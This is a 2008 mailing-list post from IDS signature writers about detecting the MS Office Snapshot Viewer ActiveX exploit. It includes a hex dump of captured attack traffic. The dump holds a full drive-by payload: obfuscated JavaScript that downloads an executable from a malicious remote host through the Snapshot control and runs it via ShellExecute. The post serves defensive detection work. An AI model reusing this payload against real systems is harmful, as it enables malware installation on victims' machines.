[Emerging-Sigs] Sig for MS Office Snapshot

Holste, Martin C - DOA martin.holste at wisconsin.gov
Tue Jul 15 15:59:57 EDT 2008 

These sigs do hit on events like the one below.  Any idea where the payload is coming from?  I'm not sure I get the "compressedPath" part.

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D    HTTP/1.1200OK.
010 : 0A 44 61 74 65 3A 20 54 75 65 2C 20 31 35 20 4A    .Date:Tue,15J
020 : 75 6C 20 32 30 30 38 20 31 34 3A 33 37 3A 31 33    ul200814:37:13
030 : 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70    GMT..Server:Ap
040 : 61 63 68 65 2F 31 2E 33 2E 34 31 20 28 55 6E 69    ache/1.3.41(Uni
050 : 78 29 20 6D 6F 64 5F 73 73 6C 2F 32 2E 38 2E 33    x)mod_ssl/2.8.3
060 : 31 20 4F 70 65 6E 53 53 4C 2F 30 2E 39 2E 37 65    1OpenSSL/0.9.7e
070 : 2D 70 31 20 50 48 50 2F 34 2E 34 2E 38 20 46 72    -p1PHP/4.4.8Fr
080 : 6F 6E 74 50 61 67 65 2F 35 2E 30 2E 32 2E 32 35    ontPage/5.0.2.25
090 : 31 30 0D 0A 58 2D 50 6F 77 65 72 65 64 2D 42 79    10..X-Powered-By
100 : 3A 20 50 48 50 2F 34 2E 34 2E 38 0D 0A 4B 65 65    :PHP/4.4.8..Kee
110 : 70 2D 41 6C 69 76 65 3A 20 74 69 6D 65 6F 75 74    p-Alive:timeout
120 : 3D 35 2C 20 6D 61 78 3D 35 30 30 0D 0A 43 6F 6E    =5,max=500..Con
130 : 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C    nection:Keep-Al
140 : 69 76 65 0D 0A 54 72 61 6E 73 66 65 72 2D 45 6E    ive..Transfer-En
150 : 63 6F 64 69 6E 67 3A 20 63 68 75 6E 6B 65 64 0D    coding:chunked.
160 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74    .Content-Type:t
170 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 33 32 63 0D    ext/html....32c.
180 : 0A 3C 68 74 6D 6C 3E 0D 0A 3C 6F 62 6A 65 63 74    .<html>..<object
190 : 20 63 6C 61 73 73 69 64 3D 27 63 6C 73 69 64 3A    classid='clsid:
200 : 46 30 45 34 32 44 35 30 2D 33 36 38 43 2D 31 31    F0E42D50-368C-11
210 : 44 30 2D 41 44 38 31 2D 30 30 41 30 43 39 30 44    D0-AD81-00A0C90D
220 : 43 38 44 39 27 20 69 64 3D 27 5A 46 7A 4B 61 4C    C8D9'id='ZFzKaL
230 : 6F 47 66 71 31 27 3E 3C 2F 6F 62 6A 65 63 74 3E    oGfq1'></object>
240 : 0D 0A 3C 73 63 72 69 70 74 20 6C 61 6E 67 75 61    ..<scriptlangua
250 : 67 65 3D 27 6A 61 76 61 73 63 72 69 70 74 27 3E    ge='javascript'>
260 : 0D 0A 76 61 72 20 64 4D 52 41 69 5A 52 58 44 54    ..vardMRAiZRXDT
270 : 32 20 3D 20 27 68 74 74 70 3A 2F 2F 30 73 6D 70    2='http://0smp
280 : 2E 72 75 2F 67 70 61 63 6B 2F 6C 6F 61 64 2E 70    .ru/gpack/load.p
290 : 68 70 3F 6F 73 3D 57 69 6E 64 6F 77 73 20 58 50    hp?os=WindowsXP
300 : 26 63 6F 75 6E 74 72 79 3D 55 53 26 62 72 6F 77    &country=US&brow
310 : 73 65 72 3D 49 6E 74 65 72 6E 65 74 20 45 78 70    ser=InternetExp
320 : 6C 6F 72 65 72 20 37 2E 30 26 72 65 66 65 72 65    lorer7.0&refere
330 : 72 3D 62 61 6C 6B 61 6E 77 65 62 2E 63 6F 6D 27    r=balkanweb.com'
340 : 3B 0D 0A 76 61 72 20 7A 48 44 4B 6E 4D 62 76 6C    ;..varzHDKnMbvl
350 : 6B 33 20 3D 20 27 43 3A 2F 49 4C 70 49 57 50 55    k3='C:/ILpIWPU
360 : 4B 57 7A 34 2E 65 78 65 27 3B 0D 0A 5A 46 7A 4B    KWz4.exe';..ZFzK
370 : 61 4C 6F 47 66 71 31 2E 53 6E 61 70 73 68 6F 74    aLoGfq1.Snapshot
380 : 50 61 74 68 20 3D 20 64 4D 52 41 69 5A 52 58 44    Path=dMRAiZRXD
390 : 54 32 3B 0D 0A 5A 46 7A 4B 61 4C 6F 47 66 71 31    T2;..ZFzKaLoGfq1
400 : 2E 43 6F 6D 70 72 65 73 73 65 64 50 61 74 68 20    .CompressedPath
410 : 3D 20 7A 48 44 4B 6E 4D 62 76 6C 6B 33 3B 0D 0A    =zHDKnMbvlk3;..
420 : 5A 46 7A 4B 61 4C 6F 47 66 71 31 2E 50 72 69 6E    ZFzKaLoGfq1.Prin
430 : 74 53 6E 61 70 73 68 6F 74 28 29 3B 0D 0A 76 61    tSnapshot();..va
440 : 72 20 41 7A 4D 52 7A 75 72 52 52 75 35 20 3D 20    rAzMRzurRRu5=
450 : 64 6F 63 75 6D 65 6E 74 2E 63 72 65 61 74 65 45    document.createE
460 : 6C 65 6D 65 6E 74 28 75 6E 65 73 63 61 70 65 28    lement(unescape(
470 : 27 25 36 46 27 29 2B 27 62 27 2B 27 6A 27 2B 75    '%6F')+'b'+'j'+u
480 : 6E 65 73 63 61 70 65 28 27 25 36 35 27 29 2B 75    nescape('%65')+u
490 : 6E 65 73 63 61 70 65 28 27 25 36 33 27 29 2B 75    nescape('%63')+u
500 : 6E 65 73 63 61 70 65 28 27 25 37 34 27 29 29 3B    nescape('%74'));
510 : 0D 0A 76 61 72 20 6C 52 42 6F 63 70 42 44 6B 6D    ..varlRBocpBDkm
520 : 36 20 3D 20 41 7A 4D 52 7A 75 72 52 52 75 35 2E    6=AzMRzurRRu5.
530 : 43 72 65 61 74 65 4F 62 6A 65 63 74 28 27 53 27    CreateObject('S'
540 : 2B 27 68 27 2B 27 65 27 2B 75 6E 65 73 63 61 70    +'h'+'e'+unescap
550 : 65 28 27 25 36 43 27 29 2B 75 6E 65 73 63 61 70    e('%6C')+unescap
560 : 65 28 27 25 36 43 27 29 2B 75 6E 65 73 63 61 70    e('%6C')+unescap
570 : 65 28 27 25 32 45 27 29 2B 27 41 27 2B 75 6E 65    e('%2E')+'A'+une
580 : 73 63 61 70 65 28 27 25 37 30 27 29 2B 27 70 27    scape('%70')+'p'
590 : 2B 27 6C 27 2B 27 69 27 2B 27 63 27 2B 75 6E 65    +'l'+'i'+'c'+une
600 : 73 63 61 70 65 28 27 25 36 31 27 29 2B 27 74 27    scape('%61')+'t'
610 : 2B 75 6E 65 73 63 61 70 65 28 27 25 36 39 27 29    +unescape('%69')
620 : 2B 75 6E 65 73 63 61 70 65 28 27 25 36 46 27 29    +unescape('%6F')
630 : 2B 75 6E 65 73 63 61 70 65 28 27 25 36 45 27 29    +unescape('%6E')
640 : 2C 22 22 29 3B 0D 0A 6C 52 42 6F 63 70 42 44 6B    ,"");..lRBocpBDk
650 : 6D 36 2E 73 68 65 6C 6C 65 78 65 63 75 74 65 28    m6.shellexecute(
660 : 22 43 3A 5C 5C 49 4C 70 49 57 50 55 4B 57 7A 34    "C:\\ILpIWPUKWz4
670 : 2E 65 78 65 22 29 3B 0D 0A 3C 2F 73 63 72 69 70    .exe");..</scrip
680 : 74 3E 0D 0A 3C 2F 68 74 6D 6C 3E 0D 0A 0D 0A 30    t>..</html>....0
690 : 0D 0A 0D 0A                                        ....

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Frank Knobbe
Sent: Monday, July 14, 2008 9:55 AM
To: Matt Jonkman
Cc: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] Sig for MS Office Snapshot

On Mon, 2008-07-14 at 10:07 -0400, Matt Jonkman wrote:
> I'm afraid this one will FP too often. Looks like it'll trip on just
> normal access. Anyone know more about it to say for sure?
>
> We need a better content anchor before that pcre as well. Anything
> there we could add?

I would make three sigs out of it, each anchored with a content on each CLSID.

-Frank

More information about the Emerging-sigs mailing list